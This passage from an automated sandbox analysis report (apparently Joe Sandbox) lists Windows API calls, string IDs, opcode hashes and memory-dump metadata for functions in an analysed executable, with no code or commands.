                            • Instruction Fuzzy Hash: ED119DB1100104ABFF108F649C40AAB37A9EB06378F514729F9A5962E0C6B9DC919769
                            APIs
                            Strings
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: 2c7ca90437079b3b191b350bcfb548b2809233641b74a9f59f6a511539fab4ad
                            • Instruction ID: 50850b0bedc7761b8d9dc0252043faec4e8f8eb08879517dd71e2a017bd5edc6
                            • Opcode Fuzzy Hash: 2c7ca90437079b3b191b350bcfb548b2809233641b74a9f59f6a511539fab4ad
                            • Instruction Fuzzy Hash: 5311E432F00125BACB35DB58E944B9F73A8AB45340F444027E815EB290D7B4AD16C799
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0043222C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00432255
                            Strings
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: 14161c38d667d03bfe65642779b78b60e9b5a81bd312d0e8061af254ee5c07b3
                            • Instruction ID: b8bdda706ceb4376d6e6d0ba1a37d318705756cc2d0a638987eeb9ca2663bcdc
                            • Opcode Fuzzy Hash: 14161c38d667d03bfe65642779b78b60e9b5a81bd312d0e8061af254ee5c07b3
                            • Instruction Fuzzy Hash: 37110270541225BADB258F518D88EFBFBA8FF0A751F10926BF91446100D2B85885DAF5
                            APIs
                            • SendMessageW.USER32(?,?,?,?), ref: 00448530
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: `$
                            • API String ID: 3850602802-74666722
                            • Opcode ID: 8c45e82f3b9f0ce80e9ea9dd7a1e2c721dfcf79616fff74119699fb44fd03283
                            • Instruction ID: 4cfa23bc5027b3c1409838c38a83df0c579210554ee889087dec8fb53c460c7f
                            • Opcode Fuzzy Hash: 8c45e82f3b9f0ce80e9ea9dd7a1e2c721dfcf79616fff74119699fb44fd03283
                            • Instruction Fuzzy Hash: 9A21D379A00209EFCB05DF98D8408AE7BB5FB4D350B01455AFD06A7360DB35AD61DBA4
                            Strings
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: c1cd0ff06b87eedd669d272730290fbafef202e7f6847bcb4285e4f4fc2b7aa1
                            • Instruction ID: 18f5894854680428237f918cb87b4de35e953a395ead546fa94039e9c1d21251
                            • Opcode Fuzzy Hash: c1cd0ff06b87eedd669d272730290fbafef202e7f6847bcb4285e4f4fc2b7aa1
                            • Instruction Fuzzy Hash: 18112E746007049FCB21DF29DC40EA5BBE6BB49320F158669FA659B6A0C771ED41CF90
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003C3C14,004852F8,?,?,?), ref: 003D096E
                              • Part of subcall function 003C7BCC: _memmove.LIBCMT ref: 003C7C06
                            • _wcscat.LIBCMT ref: 00404CB7
                            Strings
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat
                            • String ID: SH
                            • API String ID: 257928180-228610985
                            • Opcode ID: 78c22879bb4328208116cdb999f3a3a6815b1c9319136bde4be3265324044f74
                            • Instruction ID: b02c7da2b4ea2e22a6b7cdaea3e75a614f7438f6be685e423d5f9aa267acda61
                            • Opcode Fuzzy Hash: 78c22879bb4328208116cdb999f3a3a6815b1c9319136bde4be3265324044f74
                            • Instruction Fuzzy Hash: 8D1182329052089ADB06FB649C06FDE73B8AF08740F0044A7B945DB295EBB4AE844B59
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00418E73
                            Strings
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 893eddbd2fc36a244be608cfa5593d7913eb490bc04bd5945d6d02e836536a25
                            • Instruction ID: 06f30856a77d3bc64f410c2e402ccb11306615b7e9d716daa365a137f20e8395
                            • Opcode Fuzzy Hash: 893eddbd2fc36a244be608cfa5593d7913eb490bc04bd5945d6d02e836536a25
                            • Instruction Fuzzy Hash: 4101F171642219AB8B15EBA0CC45EFE7368AF06360B540A1EB826EB2E1DE395C48C755
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00418D6B
                            Strings
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 6693e71e283bfe4a1d6f3eae4fe664addde37dc5828a9ddb61da31f6657b9889
                            • Instruction ID: a2635dfff0050030ebed74a24998dd30cd9ed2ed05acb0a83ee16f4a1890332c
                            • Opcode Fuzzy Hash: 6693e71e283bfe4a1d6f3eae4fe664addde37dc5828a9ddb61da31f6657b9889
                            • Instruction Fuzzy Hash: 3201F771A41209ABCB15EBE0C956FFF73A8DF15340F50002EB806A72D1DE285E48D776
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                              • Part of subcall function 0041AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0041AABC
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00418DEE
                            Strings
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: a87011791f829112e86f333f6858f66105d2185882c8435f37049db27b3cd455
                            • Instruction ID: 70ea83fe8bdc68bcdee8f9d4be7366edabeca6f279eb4da89d1e3e2c6c0ebf90
                            • Opcode Fuzzy Hash: a87011791f829112e86f333f6858f66105d2185882c8435f37049db27b3cd455
                            • Instruction Fuzzy Hash: 4F01F271A41209A7CB11EBA4C946FFF73A88F15340F10402EB806E7292DE295E49D67A
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0041C534
                              • Part of subcall function 0041C816: _memmove.LIBCMT ref: 0041C860
                              • Part of subcall function 0041C816: VariantInit.OLEAUT32(00000000), ref: 0041C882
                              • Part of subcall function 0041C816: VariantCopy.OLEAUT32(00000000,?), ref: 0041C88C
                            • VariantClear.OLEAUT32(?), ref: 0041C556
                            Strings
                            Similarity
                            • API ID: Variant$Init$ClearCopy_memmove
                            • String ID: d}G
                            • API String ID: 2932060187-3266734438
                            • Opcode ID: 6e94e32e34ff360e6d0ddfd91a0dafdc92c732266ac7277aac4089b576dd9969
                            • Instruction ID: a9ffdb8b43328a72b7cd0e769d4b782f4752df6e137227842e838f47943c1476
                            • Opcode Fuzzy Hash: 6e94e32e34ff360e6d0ddfd91a0dafdc92c732266ac7277aac4089b576dd9969
                            • Instruction Fuzzy Hash: 0311FE719007089FC720DFAAD8C499AB7F8FB18314B50852FE58AD7611E771AA48CB54
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,003FB93A,?,?,?), ref: 0044C5F1
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0044C5D7
                            Strings
                            Similarity
                            • API ID: LongWindow$MessageProcSend
                            • String ID: `$
                            • API String ID: 982171247-74666722
                            • Opcode ID: 10d2d17627665d92329b2aeb8d36e7fe9c00aaec25cabfd48f1d7f4cd4562fe3
                            • Instruction ID: 792781854efc6d6ccb54a0f9f494d640d33363cb7f7e7a6169557d8473ac819c
                            • Opcode Fuzzy Hash: 10d2d17627665d92329b2aeb8d36e7fe9c00aaec25cabfd48f1d7f4cd4562fe3
                            • Instruction Fuzzy Hash: A401F530201214BBDB216F14CC84F6F3BA2FB85360F08442AF9411B2E0CB35AC12DB55
                            APIs
                            Strings
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: 701514ab40edaa6848b8145215dfbd348f9e490d32468c7d970475ac513362cd
                            • Instruction ID: 145134dbb4543eb12a1cb5ff9126b99318a51472377b2317c9b4df7493e5c78d
                            • Opcode Fuzzy Hash: 701514ab40edaa6848b8145215dfbd348f9e490d32468c7d970475ac513362cd
                            • Instruction Fuzzy Hash: 34E0D8326002387BD7209B9AEC4AFA7F7ACEB85B70F01016BFD04D7191D9649A458BE4
                            APIs
                              • Part of subcall function 003FB314: _memset.LIBCMT ref: 003FB321
                              • Part of subcall function 003E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003FB2F0,?,?,?,003C100A), ref: 003E0945
                            • IsDebuggerPresent.KERNEL32(?,?,?,003C100A), ref: 003FB2F4
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003C100A), ref: 003FB303
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003FB2FE
                            Similarity
                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3158253471-631824599
                            • Opcode ID: 73762ca457d88a431a85b183bffba5d41cd535f3eb5291772098ca543fe5deef
                            • Instruction ID: 1fd5f5a629d03c5e6b6a15ea2ab0ff80e44b29cd1303f135e9d6f5de0a58a918
                            • Opcode Fuzzy Hash: 73762ca457d88a431a85b183bffba5d41cd535f3eb5291772098ca543fe5deef
                            • Instruction Fuzzy Hash: 1FE092B86007508FD722DF28D504756BBE4BF00358F018A7EE486C7251EBF5D848CBA1
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00401775
                              • Part of subcall function 0043BFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043BFFE
                              • Part of subcall function 0043BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0040195E,?), ref: 0043C010
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0040196D
                            Strings
                            Similarity
                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                            • String ID: WIN_XPe
                            • API String ID: 582185067-3257408948
                            • Opcode ID: f842c9f91587c0410f60fb3487e2792f3f3adc7172289a83590967d8efffef18
                            • Instruction ID: 403edb5500cd31a8450143b18613e6ec9b47067bf445e1e54c2607c78ad94fd5
                            • Opcode Fuzzy Hash: f842c9f91587c0410f60fb3487e2792f3f3adc7172289a83590967d8efffef18
                            • Instruction Fuzzy Hash: 60F0C970800109DFDB15DB91C984FEDBBF8AB08305F5410AAE102B71A4D7798F85DF69
                            APIs
                            • FindWindowW.USER32 ref: 0044596E
                            • PostMessageW.USER32 ref: 00445981
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Strings
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 6b780f0e85cacf89d66ad282b5f9dfb16baa4b19c1f1679dd43a9f5d05da26dd
                            • Instruction ID: c8577953ffe05df0e80ca7f647b5a8fc51881e677568451987320b6493065f77
                            • Opcode Fuzzy Hash: 6b780f0e85cacf89d66ad282b5f9dfb16baa4b19c1f1679dd43a9f5d05da26dd
                            • Instruction Fuzzy Hash: DED012357C4311B7E664BB70AC0FFD76A14BF01B54F11083AB349AA5D1D9F49804CA6C
                            APIs
                            • FindWindowW.USER32 ref: 004459AE
                            • PostMessageW.USER32 ref: 004459B5
                              • Part of subcall function 00425244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004252BC
                            Strings
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 35fc4d136f639e855bc8b5a772a7330f4f49b52f6ac63daf3e1cf5b857e74514
                            • Instruction ID: 864adeda022d170ec8ad9acce8f57a3c8d78daf9802d060bf959e77faf1c374c
                            • Opcode Fuzzy Hash: 35fc4d136f639e855bc8b5a772a7330f4f49b52f6ac63daf3e1cf5b857e74514
                            • Instruction Fuzzy Hash: B9D0C9357C0311BAE664AB70AC0FFD66614AB05B54F11083AB249AA5D1D9F4A804CA6C
                            APIs
                            • DestroyIcon.USER32(00010357), ref: 003C3646
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: DestroyIcon
                            • String ID: xH$RH
                            • API String ID: 1234817797-1196700554
                            • Opcode ID: b5ce4740b321ad979f01f5bdf268b21a6948dd206c56040bd737aabc759ea443
                            • Instruction ID: 8779d1ae92f0d79eb85880e3c7351e5c4390bf6be02b7bb341d123e60965e5a0
                            • Opcode Fuzzy Hash: b5ce4740b321ad979f01f5bdf268b21a6948dd206c56040bd737aabc759ea443
                            • Instruction Fuzzy Hash: C5C01265700E4493C615B7645414E3E255996C53103008CFE6956CE292CF389C408B1D